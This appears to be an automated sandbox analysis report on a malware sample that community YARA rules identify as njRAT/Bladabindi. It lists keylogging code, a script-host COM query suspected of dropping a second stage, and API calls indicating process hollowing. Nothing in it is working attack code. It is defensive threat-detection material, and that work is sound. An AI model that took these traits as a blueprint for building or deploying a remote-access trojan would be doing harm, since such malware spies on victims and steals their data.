Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, kl.cs	.Net Code: VKCodeToUnicode

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 0_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,	0_2_00405A10
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 3_2_00AAAA46 NtQuerySystemInformation,	3_2_00AAAA46
Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 3_2_00AAAA15 NtQuerySystemInformation,	3_2_00AAAA15
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 12_2_00CBAA46 NtQuerySystemInformation,	12_2_00CBAA46
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 12_2_00CBAA15 NtQuerySystemInformation,	12_2_00CBAA15
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00C2AA46 NtQuerySystemInformation,	21_2_00C2AA46
Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00C2AA15 NtQuerySystemInformation,	21_2_00C2AA15

Source: C:\Users\user\Desktop\nOZ2Oqnzbz.exe	Code function: 0_2_00405A10	0_2_00405A10
